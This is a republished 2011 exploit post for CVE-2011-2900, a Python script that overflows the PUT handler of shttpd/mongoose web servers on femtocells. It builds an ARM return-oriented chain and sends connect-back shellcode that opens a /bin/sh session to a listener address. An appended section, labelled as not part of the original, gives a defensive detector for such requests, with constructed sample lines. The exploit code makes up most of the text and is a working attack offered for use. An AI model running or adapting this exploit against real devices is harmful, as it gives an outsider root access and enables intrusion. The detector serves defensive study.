Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability
Source: vfocus.net   Author: nion   Published: 2011-08-16

#!/usr/bin/env python
# part of femtocell research by TU-Berlin
# only for educational purposes
# Exploit Title: remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)
# Date: 2011-08-02
# Author: nion
# Software: http://code.google.com/p/mongoose/ http://sourceforge.net/projects/shttpd/
# Version: shttpd <= 1.42, mongoose <= 3.0
# CVE: CVE-2011-2900
# Tested on: Linux (proprietary embedded distro) Linux 2.6.18-ubi-sys-V2.0.17

import socket, sys, time
import urllib, struct

if(len(sys.argv) < 3):
 print sys.argv[0] + " <target ip> <listening ip>"
 sys.exit(-1)

target   = sys.argv[1]
listener = sys.argv[2]

SHELLCODE  = 0xbc568        # shellcode backup in connect struct, heap is not randomized
STACK_LIFT = "%a0%ce%31%40" # didn't want to use urllib to encode at this point,
                            # because it moves the heap address depending on whether a character is printable or not,
                            # and I was too lazy to adjust the payload when cleaning up the exploit :)

buf = "PUT /"
buf += "A" * 107 # first fill bytes will not be 148 because stack layout looks different when leaving put_dir()
buf += STACK_LIFT

# repeated stack lifting
for i in xrange(0, 26):
 buf += "A" * 148
 buf += STACK_LIFT

buf += "B"*132    # padding to overwrite pc, last jump will go over this one
buf += STACK_LIFT # this will hit pc and produce our first jump
                  # add sp, sp, #132; pop {r4, r5, r6, r7, pc}

buf += "A"*12     # this will be our last stack lifting after
buf += STACK_LIFT # jumping through our buffer back up

# let's finish the path chunk and make some padding for the
# last stack lift before pc gets popped to a different place
buf+="AAAAAAAAA/"+"A"*138


# first jump
buf += urllib.quote(struct.pack("<L", 0x4032a410))
# --,
#   v
# prepare lr so we can properly return from __clear_cache
# 0x4032a410 <makecontext+28>:  pop {lr}        ; (ldr lr, [sp], #4)
# 0x4032a414 <makecontext+32>:  add sp, sp, #8  ; 0x8
# 0x4032a418 <makecontext+36>:  bx  lr
buf+=urllib.quote(struct.pack("<L", 0x403e937c)) # free_slotinfo+128, return from __clear_cache
buf+="DDDDDDDD" # skip sp lifting, 8 dummy bytes because sp is lifted before branching

# --, bx lr
#   v
# 0x403e937c <free_slotinfo+128>:   pop {r4, pc}
buf+="CCCC" # dummy r4
buf+=urllib.quote(struct.pack("<L", 0x402e5064)) # __aeabi_cfcmple+16
# --,
#   v
# 0x402e5064 <__aeabi_cfcmple+16>:   pop {r0, r1, r2, r3, pc}
buf+="AAAA" # dummy r0
buf+="CCCC" # dummy r1 (needed for __clear_cache)
buf+="DDDD"*2 # dummy r2, r3
buf+=urllib.quote(struct.pack("<L", 0x40364bbc)) # envz_merge+184
# --,
#   v
# 0x40364bbc <envz_merge+184>:  mov r0, r11
# 0x40364bc0 <envz_merge+188>:  pop {r4, r5, r6, r7, r8, r9, r11, pc}
# at this point r11 points to an address on the heap in front of
# our shellcode, e.g. 0xad220
buf+="FFFF"*7 # dummy r4-r9+r11
buf+=urllib.quote(struct.pack("<L", 0x402e5484)) # __clear_cache
# --,
#   v
# __clear_cache will return to our prepare lr (free_slotinfo+128)
# 0x403e937c <free_slotinfo+128>:   pop {r4, pc}
buf+="AAAA" # dummy r4
buf +=urllib.quote(struct.pack("<L", SHELLCODE)) # jump to shellcode

# shellcode + some testing garbage in front of it
buf += "A"*16 # some garbage padding in front of our payload, could be nops or whatever

# make listener shellcode friendly
evil_haxxor = urllib.quote("".join([struct.pack("B", int(x)) for x in listener.split('.')]))

# connect back shellcode
buf += "%01%10%8F%E2%11%FF%2F%E1%02%20%01%21%92%1A%0F%02%19%37%01%DF%06%1C%08%A1%10%22%02%37%01%DF%3F%27%02%21%30%1c%01%df%01%39%FB%D5%05%A0%92%1A%05%b4%69%46%0b%27%01%DF%C0%46%02%00%11%5c" + evil_haxxor + "%2f%62%69%6e%2f%73%68%00/ HTTP/1.0\r\n"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, 80))
s.send(buf)
s.send("\r\n")
print s.recv(1024)
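A defender-side companion to the script above, added here as an example; it is not part of the original post and not code from the shttpd or mongoose projects. It inspects HTTP request lines for the shape of request that reaches the put_dir() overflow described in the header: a PUT whose URI is far longer than any legitimate path, carries many percent-encoded non-printable bytes, or consists of long runs of a single padding byte. The thresholds and the sample request lines are constructed assumptions for illustration, not captured traffic; the only reliable fix is to run a shttpd or mongoose release newer than the affected versions listed in the header and to leave PUT disabled where the server does not need it.

```python
from urllib.parse import unquote_to_bytes

# Thresholds are assumptions for illustration; tune them to the real service.
MAX_PUT_URI_LEN = 1024   # a legitimate PUT path on an embedded web server is far shorter
MAX_NONPRINTABLE = 8     # percent-encoded bytes outside 0x20-0x7e are rare in real paths
MAX_BYTE_RUN = 64        # long runs of one byte are typical overflow padding

# Constructed sample request lines (not captured traffic).
SAMPLE_REQUEST_LINES = [
    "PUT /upload/report.txt HTTP/1.0",                   # benign PUT
    "GET /index.html HTTP/1.1",                          # benign GET
    "PUT /" + "A" * 5000 + "/ HTTP/1.0",                 # oversized path of padding
    "PUT /" + "%a0%ce%31%40" * 40 + "/x HTTP/1.0",       # encoded non-printable bytes
    "PUT",                                               # malformed request line
]

def longest_byte_run(data):
    """Length of the longest run of one repeated byte value in data."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best

def analyze_request_line(line):
    """Inspect one HTTP request line and return (method, uri_length, reasons).

    reasons is an empty list when nothing looks suspicious.
    """
    parts = line.split(" ")
    if len(parts) != 3:
        return (None, 0, ["malformed request line"])
    method, uri, _version = parts
    reasons = []
    if method == "PUT":
        decoded = unquote_to_bytes(uri)
        if len(uri) > MAX_PUT_URI_LEN:
            reasons.append("PUT URI length %d exceeds %d" % (len(uri), MAX_PUT_URI_LEN))
        nonprintable = sum(1 for b in decoded if b < 0x20 or b > 0x7e)
        if nonprintable > MAX_NONPRINTABLE:
            reasons.append("%d non-printable bytes after percent-decoding" % nonprintable)
        run = longest_byte_run(decoded)
        if run >= MAX_BYTE_RUN:
            reasons.append("run of %d identical bytes" % run)
    return (method, len(uri), reasons)

def flagged_lines(lines):
    """Return the indices of request lines that produced at least one finding."""
    return [i for i, line in enumerate(lines) if analyze_request_line(line)[2]]

if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_REQUEST_LINES):
        method, length, reasons = analyze_request_line(line)
        print(i, method, length, reasons)
```

The checks run on the decoded URI because the script above deliberately hand-encodes its stack-lift and gadget addresses; measuring only the raw request line would still catch the length, but not the non-printable bytes that distinguish an address chain from an ordinary long path. In a reverse proxy or IDS, the same three tests can be expressed as a rule on the request line, and the thresholds should be set from observed legitimate traffic to the device.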

